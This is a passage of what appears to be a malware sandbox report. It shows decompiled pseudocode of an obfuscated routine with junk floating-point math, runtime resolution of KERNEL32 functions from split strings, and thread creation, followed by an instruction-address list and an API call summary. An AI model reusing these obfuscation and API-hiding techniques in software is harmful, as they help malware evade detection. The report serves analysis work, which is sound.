						asm("fsubp st1, st0");
						_t522 = E0039CABC();
						 *0x3ce3d4 = _t522;
						 *0x3ce294 =  *0x3ce294 + _t622;
						_t1149 =  *0x3ce360 - st1;
						 *0x3ce360 = _t1149;
						_t692 =  *0x3ce128; // 0x206a
						_v8 = _t692;
						asm("fild dword [ebp-0x4]");
						_v28 = _t1149;
						 *0x3ce0a4 =  *0x3ce0a4 * _v28;
						 *0x3ce058 =  *0x3ce058 - st1;
						_v28 =  *0x3ce60c;
						asm("fsubr qword [ebp-0x18]");
						asm("fcompp");
						asm("fnstsw ax");
						_t1158 =  *0x3ce3c0 - st1;
						 *0x3ce3c0 = _t1158;
						if((_t522 & 0x00000005) == 0) {
							_t538 =  *0x3ce0fc; // 0xe5101c30
							_v8 = _t538 + 0x595f4a6e;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1158;
							 *0x3ce1a8 =  *0x3ce1a8 + _v28;
							 *0x3ce0fc =  *0x3ce0fc + _t622;
						}
						_t881 =  &(_t881[1]);
						_v28 =  *0x3ce5b0 +  *0x3c8380 -  *0x3c837c;
						 *0x3ce450 =  *0x3ce450 * _v28;
						asm("fsubrp st2, st0");
						asm("fxch st0, st1");
						 *0x3ce510 =  *0x3ce510 -  *0x3ce0d0;
						 *0x3ce10c = ( *0x3ce10c & 0x0000ffff) - 0x5bbc02a0;
						 *0x3ce04c = E0039CABC();
						 *0x3ce3e8 =  *0x3ce3e8 + _t622;
						_t821 =  *0x3ce3e8; // 0x80000000
						 *0x3ce108 =  *0x3ce108 + 1;
						_t525 = 0xde220361 - _t821;
						if(_t525 == ( *0x3ce108 & 0x0000ffff)) {
							 *0x3ce438 =  *0x3ce438 *  *0x3c8378;
						}
						_v28 =  *0x3ce210 +  *0x3c8370;
						_v28 =  *0x3ce450 + _v28;
						asm("fcomp qword [ebp-0x18]");
						asm("fnstsw ax");
						 *0x3ce450 =  *0x3ce450 - st1;
						_t1178 =  *0x3ce210 - st1;
						 *0x3ce210 = _t1178;
						if((_t525 & 0x00000005) == 0) {
							_t536 =  *0x3ce5c4; // 0x7fffffff
							_v8 = _t536;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1178;
							 *0x3ce5c4 = E0039CABC();
							 *0x3ce490 =  *0x3ce490 - st1;
						}
						 *0x3ce470 =  *0x3ce470 *  *0x3c83f8;
						_t696 =  *0x3ce4fc; // 0x94b9
						asm("fsubr qword [0x3c83f0]");
						_v8 = _t696;
						_v28 =  *0x3ce240 -  *0x3c83e8;
						asm("fild dword [ebp-0x4]");
						_t526 = E0039CABC();
						_t397 =  &_v32;
						 *_t397 = _v32 - 1;
						 *0x3ce4fc = _t526;
						_t1185 =  *0x3ce240 + st1;
						 *0x3ce240 = _t1185;
						if( *_t397 != 0) {
							st0 = _t1185;
							continue;
						} else {
							 *0x3ce1b0 =  *0x3ce1b0 - st1;
							_t527 =  *0x3ce478; // 0x80000000
							_v8 = _t527;
							_v28 =  *0x3ce1b0 -  *0x3c8360;
							asm("fild dword [ebp-0x4]");
							asm("fcomp qword [ebp-0x18]");
							asm("fnstsw ax");
							if((_t527 & 0x00000041) == 0) {
								_t704 =  *0x3ce460; // 0x6c98b0f1
								_t829 =  *0x3ce2ec; // 0x76d570f4
								 *0x3ce460 = _t704 - _t829;
							}
							 *0x3ce3c0 =  *0x3ce3c0 *  *0x3c8358;
							 *0x3ce5e8 =  *0x3ce5e8 + st1;
							asm("fsubr qword [0x3c8350]");
							asm("fsubp st1, st0");
							 *0x3ce528 =  *0x3ce5e8;
							 *0x3ce2f8 = ( *0x3ce2f8 & 0x0000ffff) + 0x3c7c9748;
							_t697 =  *0x3ce37c; // 0x277c3928
							 *0x3ce37c = _t697 * 0x818d98ac;
							 *0x3ce3e8 =  *0x3ce3e8 + 0x3efa7e4f;
							_t1197 =  *0x3ce4a0 -  *0x3c8348;
							 *0x3ce4a0 = _t1197;
							 *0x3ce1b8 = _t1197 +  *0x3ce1b8;
							_t1200 =  *0x3ce1b8 -  *0x3c8340;
							 *0x3ce074 = _t1200;
							_t824 =  *0x3ce4bc; // 0x45d8d594
							_t699 =  *0x3ce024; // 0x80000001
							 *0x3ce4bc = _t824 - _t699;
							_t700 =  *0x3ce0e8; // 0xe89a10bc
							 *0x3d073c = 0x3c3560 -  *0x3d073c;
							 *0x3ce0b8 = _t700 + ( *0x3ce0b8 & 0x0000ffff);
							 *0x3ce508 =  *0x3ce508 + _t622;
							_v8 =  *0x3ce508 & 0x0000ffff;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1200;
							asm("fsubr qword [ebp-0x18]");
							_v28 =  *0x3ce0a0;
							 *0x3ce3f8 =  *0x3ce3f8 + _v28;
							_t1204 =  *0x3ce4a0;
							_t702 =  *0x3ce3d4; // 0x977dff82
							_v8 = _t702 - 0x589e9e86;
							asm("fild dword [ebp-0x4]");
							asm("fsubp st1, st0");
							 *0x3ce4a0 = _t1204;
							_v8 =  *0x3ce4c4 & 0x0000ffff;
							asm("fild dword [ebp-0x4]");
							_v28 = _t1204;
							asm("fsubr qword [ebp-0x18]");
							_t535 = E0039CABC();
							 *0x3ce4c4 = _t535;
							asm("in al, 0x3c");
							asm("adc eax, 0x3d073c"); // executed
							asm("aaa");
							return _t535;
						}
					}
				} else {
					do {
						_t1327 =  *0x3ce578;
						asm("faddp st2, st0");
						asm("fxch st0, st1");
						 *0x3ce578 = _t1327;
						_t854 =  *0x3ce140; // 0x5ea6
						_v8 = _t854;
						asm("fild dword [ebp-0x4]");
						_v20 = _t1327;
						asm("fsubp st1, st0");
						 *0x3ce2b8 =  *0x3ce578 + _v20;
						_t1331 =  *0x3ce260;
						_t730 =  *0x3ce390; // 0xcd6d4fea
						_v20 = _t1331;
						_v8 = _t730 - 0x550e0539;
						asm("fild dword [ebp-0x4]");
						asm("fsubr qword [ebp-0x10]");
						 *0x3ce260 = _t1331;
						 *0x3ce460 =  *0x3ce460 + 1;
						_t855 =  *0x3ce460; // 0x6c98b0f1
						_v8 = _t855 - 0x410225f0;
						asm("fild dword [ebp-0x4]");
						_v36 = _t1331;
						_t586 =  *0x3ce17c; // 0xb2a9
						_t1333 =  *0x3ce394 -  *0x3c8518;
						 *0x3ce17c =  *0x3ce17c + 1;
						_v8 = _t586;
						_v20 = _t1333;
						asm("fild dword [ebp-0x4]");
						asm("fcomp qword [ebp-0x20]");
						asm("fnstsw ax");
						_t1335 = _t1333 + _v20 +  *0x3ce394;
						 *0x3ce394 = _t1335;
						if((_t586 & 0x00000041) == 0) {
							_t871 =  *0x3ce55c; // 0x0
							 *0x3ce55c =  *0x3ce55c + 1;
							if(_t871 + 0x53cf90f <= 0xec7c2f59) {
								_t751 =  *0x3ce390; // 0xcd6d4fea
								 *0x3ce390 = _t751 * 0x4d8c5e0c;
							}
						}
						 *0x3ce0e0 =  *0x3ce0e0 + 0x3c636d6d;
						 *(0x3cfdb8 + _t879 * 4) = 0;
						 *0x3ce0c8 = ( *0x3ce0c8 & 0x0000ffff) + 0x439cd323;
						_t587 =  *0x3ce49c; // 0x3b0d
						_v8 = _t587 - 0x1d8f1928;
						asm("fild dword [ebp-0x4]");
						_v20 = _t1335;
						_t1336 =  *0x3ce5b8;
						asm("fsubr qword [ebp-0x10]");
						_v20 = _t1336;
						_v8 =  *0x3ce014 & 0x0000ffff;
						asm("fild dword [ebp-0x4]");
						_t589 = E0039CABC();
						 *0x3ce014 = _t589;
						_t735 =  *0x3ce580; // 0xffff
						_v8 = _t735;
						asm("fild dword [ebp-0x4]");
						_v20 = _t1336 * _v20;
						_t1339 = _v20;
						asm("fucompp");
						asm("fnstsw ax");
						if((_t589 & 0x00000044) == 0) {
							_t1339 =  *0x3ce348 *  *0x3c8514;
							 *0x3ce348 = _t1339;
						}
						_t590 = CreateThread(0, 0, E00389C80, _t879, 0, 0); // executed
						 *0x3ce608 = ( *0x3ce608 & 0x0000ffff) + 0x37762b4f;
						_t861 =  *0x3ce350; // 0xdea3a412
						_v8 = _t861 + 0x7ed3179e;
						asm("fild dword [ebp-0x4]");
						_v20 = _t1339;
						 *0x3ce468 =  *0x3ce468 + _v20;
						 *0x3ce10c =  *0x3ce10c + 1;
						 *0x3ce5d0 = ( *0x3ce10c & 0x0000ffff) - 0x49a51d2d; // executed
						FindCloseChangeNotification(_t590);
						_t863 =  *0x3ce0dc; // 0x5ed85cde
						_t592 =  *0x3ce2b0; // 0xef43cad8
						_t166 = _t863 + 0x26bfca76; // 0x11603954e
						 *0x3ce0dc = _t592 + _t166;
						_v20 =  *0x3c8510 -  *0x3ce130;
						asm("fcomp qword [ebp-0x10]");
						asm("fnstsw ax");
						asm("fld1");
						asm("faddp st2, st0");
						asm("fxch st0, st1");
						 *0x3ce20c = st0;
						if((_t592 & 0x00000001) != 0) {
							asm("fld1");
						} else {
							asm("fld1");
							asm("fxch st0, st1");
							 *0x3ce5e8 =  *0x3ce5e8 + st0;
							_t1367 =  *0x3ce5e8;
							_t869 =  *0x3ce10c; // 0x3ef8
							_t603 = _t869;
							_v36 = _t1367;
							_v8 = _t603;
							asm("fild dword [ebp-0x4]");
							_v20 = _t1367;
							asm("fsubr qword [ebp-0x10]");
							asm("fcomp qword [ebp-0x20]");
							asm("fnstsw ax");
							if((_t603 & 0x00000001) == 0) {
								 *0x3ce0c8 =  *0x3ce0c8 + 1;
								 *0x3ce17c =  *0x3ce17c + _t622;
							}
						}
						_t593 =  *0x3ce330; // 0xd6366c82
						 *0x3ce48c = ( *0x3ce48c & 0x0000ffff) * (_t593 + 0x597467c1);
						 *0x3ce330 =  *0x3ce330 + 1;
						 *0x3ce594 = ( *0x3ce4f4 & 0x0000ffff) - 0xece9b45;
						_t743 =  *0x3ce430; // 0x9f0c3f1f
						 *0x3ce45c =  *0x3ce45c - _t743;
						 *0x3ce430 =  *0x3ce430 + 1;
						_t744 =  *0x3ce1d0; // 0x2f751c97
						_t597 =  *0x3ce014 & 0x0000ffff;
						 *0x3ce1d0 = _t744 * _t597;
						_t879 = _t879 + 1;
						_v20 =  *0x3ce044 -  *0x3c8508;
						asm("fcomp qword [ebp-0x10]");
						asm("fnstsw ax");
						 *0x3ce138 =  *0x3ce138 - st1;
						if((_t597 & 0x00000001) == 0) {
							_t868 =  *0x3ce0b8; // 0xf45e
							_t1362 =  *0x3ce120 -  *0x3c84f8;
							_v8 = _t868;
							_v20 = _t1362;
							asm("fild dword [ebp-0x4]");
							asm("fsubr qword [ebp-0x10]");
							_v20 = _t1362;
							 *0x3ce3b0 =  *0x3ce3b0 + _v20;
							 *0x3ce0b8 =  *0x3ce0b8 + 1;
						}
						_t746 =  *0x3ce508; // 0x8dea
						_t866 =  *0x3ce1ec; // 0x6050
						_t599 = _t866 - _t746;
						_t748 =  *0x3ce330; // 0xd6366c82
						_t183 = _t599 + 0x21dcb3d5; // 0xf8132057
						 *0x3ce1ec = _t748 + _t183;
						 *0x3ce508 =  *0x3ce508 + 1;
						 *0x3ce330 =  *0x3ce330 + _t622;
						 *0x3ce488 = 0xce2d521a;
						 *0x3ce0b0 =  *0x3ce134 -  *0x3c84f0;
						 *0x3ce1d0 =  *0x3ce1d0 + 0x2f751c99;
						_v20 =  *0x3ce07c;
						_t600 =  *0x3ce264; // 0x80000000
						_v8 = _t600;
						_v20 =  *0x3ce428 + _v20;
						asm("fild dword [ebp-0x4]");
						 *0x3ce264 = E0039CABC();
						_t749 =  *0x3d0448; // 0x3c3935
						 *0x3ce428 =  *0x3ce428 + st1;
						asm("fxch st0, st1");
						_t189 = _t749 + 0x4b0; // 0xe3
					} while (_t879 !=  *_t189);
					goto L44;
				}
			}

0x00387210
0x00387219
0x0038721c
0x00387221
0x0038722a
0x00387237
0x00387240
0x00387243
0x00387249
0x0038724c
0x00387250
0x00387256
0x00387259
0x0038725f
0x00387265
0x00387269
0x0038726f
0x0038727f
0x00387286
0x0038728c
0x00387293
0x0038729d
0x003872a4
0x003872ab
0x003872b2
0x003872b8
0x003872bf
0x003872c6
0x003872ca
0x003872d1
0x003872d7
0x003872dd
0x003872e4
0x003872ea
0x003872f1
0x003872f7
0x003872fe
0x00387308
0x0038730f
0x00387315
0x00387319
0x0038731d
0x00387321
0x00387327
0x00387333
0x00387336
0x00387339
0x00387342
0x0038734e
0x00387351
0x00387354
0x0038735f
0x00387365
0x0038736b
0x00387371
0x00387374
0x00387377
0x0038737f
0x00387382
0x00387394
0x0038739a
0x003873a2
0x003873ae
0x003873ba
0x003873ca
0x003873d0
0x003873d3
0x003873d6
0x003873e1
0x003873ed
0x003873ef
0x003873f2
0x003873f5
0x003873f7
0x003873f9
0x00387405
0x0038740b
0x00387411
0x00387423
0x00387428
0x0038742e
0x00387432
0x00387439
0x00387442
0x0038744d
0x00387465
0x00387471
0x00387480
0x00387489
0x0038748c
0x0038748f
0x0038749b
0x0038749d
0x003874b1
0x003874b3
0x003874b8
0x003874ea
0x003874f6
0x003874ba
0x003874ba
0x003874c0
0x003874ca
0x003874cd
0x003874d0
0x003874d3
0x003874d6
0x003874dc
0x003874dc
0x003874fc
0x00387502
0x00387507
0x0038750f
0x00387512
0x0038751d
0x00387520
0x00387526
0x0038752c
0x0038753a
0x0038753d
0x00387540
0x00387546
0x00387550
0x0038755a
0x0038759c
0x003875a5
0x003875a8
0x003875b6
0x003875bf
0x003875cd
0x003875cd
0x0038755c
0x00387562
0x00387564
0x0038756c
0x00387572
0x00387578
0x0038757b
0x0038757e
0x00387589
0x00387589
0x003875d9
0x003875e9
0x003875ec
0x003875f2
0x003875f5
0x003875f8
0x00387600
0x00387606
0x0038761b
0x0038762d
0x00387630
0x00387637
0x00387645
0x00387666
0x00387670
0x0038767f
0x00387685
0x00387647
0x00387647
0x0038764e
0x0038765e
0x0038765e
0x0038768c
0x00387691
0x00387694
0x00387697
0x003876a6
0x003876a9
0x003876ae
0x003876b4
0x003876b8
0x003876c6
0x003876cb
0x003876d0
0x003876d3
0x003876d6
0x003876de
0x003876e4
0x003876f0
0x003876f4
0x003876f6
0x003876fc
0x00387712
0x00387718
0x0038771e
0x00387724
0x0038772a
0x00387730
0x00387732
0x00387734
0x0038773a
0x00387744
0x00387747
0x0038774a
0x00387759
0x0038775c
0x00387761
0x00387767
0x0038776d
0x00387775
0x00387777
0x0038777e
0x00387783
0x00387797
0x003877c4
0x003877d3
0x003877d6
0x003877d9
0x003877df
0x003877e4
0x00387799
0x00387799
0x003877a0
0x003877ab
0x003877b0
0x003877b6
0x003877b6
0x003877f6
0x00387808
0x0038780a
0x00387816
0x0038781a
0x0038781c
0x00387828
0x0038782c
0x0038782e
0x00387830
0x0038783c
0x00387848
0x00387854
0x00387857
0x0038785a
0x0038785d
0x00387860
0x00387862
0x00387867
0x003878d0
0x003878d8
0x003878e1
0x003878e4
0x00387869
0x0038786f
0x00387871
0x00387881
0x00387893
0x0038789c
0x003878a2
0x003878a5
0x003878aa
0x003878ac
0x003878b6
0x003878b9
0x003878bc
0x003878c5
0x003878c8
0x003878c8
0x003878aa
0x003878ea
0x003878f4
0x003878f7
0x003878fa
0x0038790f
0x00387917
0x0038791d
0x00387923
0x0038792d
0x00387980
0x00387987
0x0038798d
0x00387997
0x0038799a
0x003879a0
0x003879a3
0x003879a6
0x003879a9
0x003879ac
0x003879b7
0x003879bd
0x003879c4
0x003879ca
0x0038792f
0x0038792f
0x00387935
0x0038793b
0x0038793e
0x00387941
0x00387944
0x00387947
0x00387950
0x00387958
0x00387964
0x00387966
0x0038796c
0x00387972
0x00387972
0x003879d0
0x003879d6
0x003879dd
0x003879e2
0x00387a0c
0x00387a0e
0x00387a18
0x00387a1b
0x00387a1e
0x00387a1e
0x00387a24
0x00387a2a
0x00387a36
0x00387a39
0x00387a41
0x00387a43
0x00387a49
0x00387a4f
0x00387a55
0x00387a60
0x00387a66
0x00387a6c
0x00387a76
0x00387a78
0x00387a84
0x00387a89
0x00387aa0
0x00387aa6
0x00387ac4
0x00387ac6
0x00387acc
0x00387ad2
0x00387ad5
0x00387ad8
0x00387ad8
0x00387ade
0x00387ae4
0x00387ae9
0x00387aec
0x00387aef
0x00387af2
0x00387afe
0x00387b01
0x00387b0d
0x00387b0f
0x00387b11
0x00387b13
0x00387b15
0x00387b1b
0x00387b21
0x00387b2b
0x00387b2e
0x00387b38
0x00387b3b
0x00387b44
0x00387b4d
0x00387b56
0x00387b5b
0x00387b61
0x00387b64
0x00387b67
0x00387b6a
0x00387b70
0x00387b72
0x00387b7a
0x00387b7c
0x00387b7e
0x00387b80
0x00387b86
0x00387b90
0x00387bb7
0x00387b92
0x00387b98
0x00387ba3
0x00387ba9
0x00387baf
0x00387baf
0x00387bb9
0x00387bc9
0x00387bd3
0x00387bd9
0x00387bdf
0x00387bdf
0x00387be5
0x00387bf0
0x00387bf3
0x00387bfe
0x00387c04
0x00387c0a
0x00387c0f
0x00387c19
0x00387c1c
0x00387c22
0x00387c2b
0x00387c33
0x00387c3e
0x00387c42
0x00387c44
0x00387c4a
0x00387c56
0x00387c5f
0x00387c65
0x00387c6b
0x00387c6e
0x00387c74
0x00387c7a
0x00387c7d
0x00387c80
0x00387c89
0x00387c91
0x00387c9c
0x00387c9e
0x00387ca0
0x00387ca2
0x00387ca4
0x00387caa
0x00387cb4
0x00387cb7
0x00387cba
0x00387cc9
0x00387cd1
0x00387cdf
0x00387ceb
0x00387cf7
0x00387d05
0x00387d17
0x00387d1d
0x00387d24
0x00387d2a
0x00387d3b
0x00387d49
0x00387d49
0x00387d55
0x00387d5e
0x00387d66
0x00387d69
0x00387d6c
0x00387d77
0x00387d82
0x00387d8a
0x00387d96
0x003881c0
0x003881c0
0x003881c6
0x003881cd
0x003881d3
0x003881d8
0x003881db
0x003881de
0x003881e1
0x003881e7
0x003881f6
0x00388202
0x0038821a
0x0038821c
0x00388221
0x00388223
0x00388234
0x0038823a
0x0038823a
0x00388252
0x00388264
0x0038826a
0x00388276
0x00388279
0x0038827c
0x0038827f
0x00388282
0x00388284
0x00388289
0x00388291
0x00388297
0x003882a0
0x003882a3
0x003882a6
0x003882a9
0x003882b1
0x003882b1
0x003882b7
0x003882c4
0x003882cd
0x003882d5
0x003882dc
0x003882e6
0x003882f0
0x003882f9
0x003882fc
0x003882ff
0x00388301
0x00388307
0x0038830d
0x00388313
0x0038831f
0x00388322
0x00388325
0x00388327
0x00388337
0x0038833a
0x0038833d
0x00388346
0x00388349
0x0038834f
0x00388355
0x00388358
0x0038835b
0x0038836a
0x00388372
0x00388377
0x0038837d
0x00388380
0x00388383
0x00388394
0x003883a1
0x003883b3
0x003883bf
0x003883cd
0x003883d7
0x003883d7
0x003883dd
0x003883ec
0x003883ee
0x003883f4
0x003883fe
0x00388407
0x0038840a
0x0038840d
0x00388419
0x0038841c
0x0038841c
0x00388422
0x0038842f
0x00388438
0x0038843f
0x00388442
0x00388449
0x0038844f
0x00388452
0x00388458
0x00388460
0x00388463
0x00388466
0x00388469
0x0038846c
0x0038846f
0x00388472
0x00388475
0x0038847a
0x00388492
0x00388498
0x003884a2
0x003884a9
0x003884b3
0x003884b9
0x0038847c
0x00388489
0x00388489
0x003884c0
0x003884c6
0x003884cd
0x003884d6
0x003884e5
0x003884ec
0x003884f4
0x00000000
0x00000000
0x00388507
0x00388524
0x00388535
0x00388537
0x00388551
0x0038855f
0x00388568
0x0038857a
0x0038858f
0x003885a1
0x003885b2
0x003885b8
0x003885c8
0x003885ca
0x003885cd
0x003885d0
0x003885dc
0x003885e2
0x003885e9
0x003885ef
0x003885f5
0x003885fa
0x00388682
0x0038868c
0x0038868f
0x00388692
0x003886a4
0x003886a6
0x00388600
0x00388600
0x00388606
0x00388609
0x0038860c
0x00388615
0x0038861b
0x00388621
0x00388624
0x00388629
0x00388651
0x00388653
0x00388659
0x0038865e
0x00388661
0x00388664
0x00388673
0x0038867b
0x0038862b
0x0038862b
0x00388637
0x0038863a
0x0038863d
0x00388643
0x00388643
0x00388629
0x003886b4
0x003886cc
0x003886de
0x003886f5
0x00388700
0x00388702
0x00388708
0x00388712
0x0038871c
0x00388721
0x0038872e
0x00388734
0x0038873a
0x00388740
0x00388747
0x0038874e
0x00388754
0x00388757
0x0038875f
0x00388762
0x00388765
0x00388768
0x0038876b
0x0038876e
0x00388777
0x00388780
0x00388783
0x00388788
0x003887a6
0x003887b2
0x003887b7
0x003887bd
0x003887c0
0x003887c3
0x003887c9
0x003887d5
0x0038878a
0x00388796
0x00388796
0x003887db
0x003887e1
0x003887e3
0x003887e5
0x003887eb
0x003887f1
0x003887fe
0x00388804
0x00388807
0x0038880a
0x00388810
0x00388819
0x0038881c
0x00388822
0x00388828
0x0038882b
0x0038882e
0x0038883d
0x00388845
0x00388850
0x00388856
0x0038885c
0x00388866
0x00388869
0x0038886c
0x00388875
0x0038887e
0x00388880
0x00388882
0x00388888
0x00388891
0x003888d1
0x003888db
0x003888e1
0x00388893
0x00388893
0x0038889a
0x003888aa
0x003888ad
0x003888b0
0x003888bc
0x003888c2
0x003888c9
0x003888c9
0x003888ea
0x003888fc
0x00388908
0x0038890e
0x00388910
0x003883d5
0x003883d6
0x00388923
0x00388935
0x00388947
0x0038895f
0x0038896b
0x00388979
0x0038898b
0x00388991
0x00388996
0x0038899c
0x003889a2
0x003889b5
0x003889b7
0x003889be
0x003889ce
0x003889ce
0x003889d8
0x003889e5
0x003889eb
0x003889f1
0x003889f6
0x003889fc
0x00388a03
0x00388a06
0x00388a09
0x00388a12
0x00388a18
0x00388a1e
0x00388a21
0x00388a26
0x00388a28
0x00388a32
0x00388a35
0x00388a38
0x00388a44
0x00388a50
0x00388a52
0x00388a58
0x00388a58
0x00388a6b
0x00388a72
0x00388a77
0x00388a7d
0x00388a84
0x00388a8a
0x00388a90
0x00388a96
0x00388aa2
0x00388ab1
0x00388aba
0x00388abd
0x00388ac0
0x00388aca
0x00388ad3
0x00388af9
0x00388ad5
0x00388ae0
0x00388ae0
0x00388b06
0x00388b14
0x00388b1a
0x00388b20
0x00388b3b
0x00388b42
0x00388b55
0x00388b68
0x00388b71
0x00388b77
0x00388b7a
0x00388b7d
0x00388b83
0x00388b88
0x00388b8b
0x00388b97
0x00388b9e
0x00388bb2
0x00388bb2
0x00388bb9
0x00388bca
0x00388bdb
0x00388bed
0x00388c05
0x00388c11
0x00388c13
0x00388c1b
0x00388c1f
0x00388c21
0x00388c23
0x00388c2c
0x00388c2e
0x00388c3a
0x00388c3a
0x00388c52
0x00388c54
0x00388c60
0x00388c6c
0x00388c72
0x00388c7f
0x00388c83
0x00388c85
0x00388c91
0x00388c9a
0x00388ca1
0x00388ca4
0x00388cad
0x00388cb3
0x00388cb6
0x00388cb9
0x00388cbf
0x00388cc2
0x00388cc8
0x00388ccb
0x00388cce
0x00388cd1
0x00388cd7
0x00388cdd
0x00388ce0
0x00388ce3
0x00388ce6
0x00388ce9
0x00388cec
0x00388cef
0x00388cf2
0x00388cf5
0x00388cf7
0x00388cfc
0x00388d04
0x00388d0d
0x00388d12
0x00388d15
0x00388d18
0x00388d1b
0x00388d1e
0x00388d21
0x00388d26
0x00388d26
0x00388d2f
0x00388d2f
0x00388d35
0x00388d38
0x00388d3b
0x00388d53
0x00388d55
0x00388d5f
0x00388d6b
0x00388d6d
0x00388d73
0x00388d7c
0x00388d8a
0x00388d90
0x00388d92
0x00388d97
0x00388d99
0x00388d9f
0x00388da9
0x00388db1
0x00388db4
0x00388db7
0x00388dba
0x00388dc0
0x00388dc0
0x00388d97
0x00388dda
0x00388de1
0x00388de8
0x00388def
0x00388e00
0x00388e00
0x00388e07
0x00388e0a
0x00388e0d
0x00388e16
0x00388e1d
0x00388e20
0x00388e22
0x00388e27
0x00388e3e
0x00388e4a
0x00388e56
0x00388e5f
0x00388e67
0x00388e6d
0x00388e73
0x00388e78
0x00388e7d
0x00388e80
0x00388e83
0x00388e86
0x00388e90
0x00388e9c
0x00388e9e
0x00388ea7
0x00388eaf
0x00388eb5
0x00388eb5
0x00388e29
0x00388e29
0x00388e33
0x00388e33
0x00388ec6
0x00000000
0x00000000
0x00388ecc
0x00388ed6
0x00388edd
0x00388ee6
0x00388eed
0x00388ef0
0x00388ef3
0x00388f02
0x00388f05
0x00388f0f
0x00388f18
0x00388f50
0x00388f68
0x00388f1a
0x00388f20
0x00388f2f
0x00388f32
0x00388f40
0x00388f40
0x00388f74
0x00388f83
0x00388f86
0x00388f89
0x00388f8c
0x00388f8f
0x00388f97
0x00388f99
0x00388fa2
0x00388ffa
0x00388ffc
0x00388fa4
0x00388fb0
0x00388fbc
0x00388fc8
0x00388fd4
0x00388fd6
0x00388fe4
0x00388fe6
0x00388fec
0x00388ff2
0x00388ff2
0x00388ffe
0x00389004
0x00389007
0x0038900c
0x00389015
0x00389018
0x0038901e
0x00389024
0x0038902a
0x00389030
0x00389037
0x0038903e
0x00389045
0x0038904b
0x00389050
0x00389053
0x00389056
0x0038905f
0x00389068
0x0038907d
0x00389080
0x00389088
0x0038908c
0x0038908e
0x00389097
0x0038909f
0x003890a4
0x003890a4
0x003890b0
0x003890b6
0x003890bc
0x00388d2d
0x00388d2e
0x003890c3
0x003890c9
0x003890cc
0x003890cf
0x003890db
0x003890e7
0x003890f1
0x003890f4
0x003890f7
0x003890f9
0x003890fe
0x00389103
0x00389110
0x00389112
0x00389118
0x00389122
0x00389125
0x00389128
0x00389134
0x00389142
0x0038914e
0x0038915d
0x00389160
0x00389162
0x0038916a
0x0038916c
0x00389175
0x00389177
0x00389181
0x00389184
0x00389187
0x00389193
0x00389199
0x00389199
0x003891a5
0x003891b4
0x003891c0
0x003891cc
0x003891ce
0x003891e2
0x003891f5
0x00389207
0x0038920d
0x00389213
0x00389220
0x0038922c
0x00389233
0x00389241
0x00389241
0x00389253
0x0038925f
0x00389274
0x00389277
0x00389281
0x0038928d
0x0038928f
0x00389298
0x0038929a
0x0038929f
0x003892a2
0x003892a5
0x003892b6
0x003892c3
0x003892c3
0x003892d5
0x003892e1
0x003892e8
0x003892f1
0x003892fa
0x003892fd
0x00389303
0x00389308
0x00389308
0x0038930b
0x00389317
0x00389319
0x0038931f
0x00388bb0
0x00000000
0x00389325
0x0038932d
0x00389339
0x00389344
0x00389347
0x0038934a
0x0038934d
0x00389350
0x00389355
0x00389357
0x0038935d
0x00389365
0x00389365
0x00389377
0x00389385
0x00389397
0x0038939d
0x0038939f
0x003893b1
0x003893b7
0x003893ce
0x003893d4
0x003893e4
0x003893ea
0x003893f6
0x00389402
0x00389408
0x0038940e
0x00389414
0x0038941c
0x00389429
0x0038942f
0x00389439
0x00389440
0x00389451
0x00389454
0x00389457
0x00389460
0x00389463
0x0038946f
0x00389475
0x0038947b
0x00389487
0x0038948a
0x0038948d
0x0038948f
0x0038949f
0x003894a2
0x003894a5
0x003894b4
0x003894b7
0x003894bc
0x003894bf
0x003894c3
0x003894c8
0x003894c9
0x003894c9
0x0038931f
0x00387d9c
0x00387d9c
0x00387d9c
0x00387da2
0x00387da4
0x00387da6
0x00387dac
0x00387db6
0x00387db9
0x00387dbc
0x00387dce
0x00387dd0
0x00387dd6
0x00387ddc
0x00387de2
0x00387deb
0x00387dee
0x00387df1
0x00387df4
0x00387dfa
0x00387e00
0x00387e0c
0x00387e0f
0x00387e12
0x00387e1b
0x00387e21
0x00387e27
0x00387e31
0x00387e34
0x00387e37
0x00387e3d
0x00387e40
0x00387e42
0x00387e48
0x00387e51
0x00387e53
0x00387e5a
0x00387e6e
0x00387e70
0x00387e7c
0x00387e7c
0x00387e6e
0x00387e82
0x00387e99
0x00387ea4
0x00387eab
0x00387eba
0x00387ebd
0x00387ec0
0x00387ec3
0x00387ed0
0x00387ed6
0x00387ed9
0x00387edc
0x00387ee2
0x00387ee7
0x00387eed
0x00387ef7
0x00387efa
0x00387efd
0x00387f06
0x00387f09
0x00387f0b
0x00387f10
0x00387f18
0x00387f1e
0x00387f1e
0x00387f32
0x00387f45
0x00387f4c
0x00387f58
0x00387f5c
0x00387f5f
0x00387f6b
0x00387f71
0x00387f85
0x00387f8c
0x00387f92
0x00387f98
0x00387fa3
0x00387faa
0x00387fb6
0x00387fbf
0x00387fc2
0x00387fca
0x00387fce
0x00387fd0
0x00387fd2
0x00387fdb
0x00388042
0x00387fdd
0x00387fe3
0x00387fe7
0x00387fe9
0x00387fef
0x00387ff5
0x00387ffc
0x00387fff
0x00388002
0x00388005
0x00388008
0x00388011
0x0038801a
0x0038801d
0x00388022
0x00388024
0x00388039
0x00388039
0x00388022
0x00388044
0x00388058
0x0038805f
0x00388074
0x00388079
0x0038807f
0x00388085
0x00388092
0x00388098
0x0038809e
0x003880a4
0x003880b2
0x003880c1
0x003880c4
0x003880ce
0x003880d7
0x003880df
0x003880e6
0x003880ef
0x003880f2
0x003880f5
0x003880f8
0x003880fb
0x00388107
0x0038810d
0x0038810d
0x00388114
0x0038811b
0x00388128
0x0038812a
0x00388130
0x00388137
0x0038813e
0x00388145
0x0038814b
0x00388161
0x00388167
0x00388177
0x00388180
0x00388188
0x0038818b
0x0038818e
0x00388199
0x003881a4
0x003881ac
0x003881b2
0x003881b4
0x003881b4
0x00000000
0x00387d9c

APIs

GetModuleHandleA.KERNEL32(Kern), ref: 0038740B
GetProcAddress.KERNEL32(74CA0000,Creat), ref: 00387439
GetProcAddress.KERNEL32(74CA0000,CreateThread), ref: 00387507
GetProcAddress.KERNEL32(74CA0000,SetEve), ref: 003876BE
GetProcAddress.KERNEL32(74CA0000,WaitForSingleObj), ref: 00387775
GetProcAddress.KERNEL32(74CA0000,CloseHandSetEve), ref: 003879DB
GetProcAddress.KERNEL32(74CA0000,00006C53), ref: 00387A76
_memset.LIBCMT ref: 00387C0A
CreateThread.KERNELBASE ref: 00387F32
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00387F8C

Strings

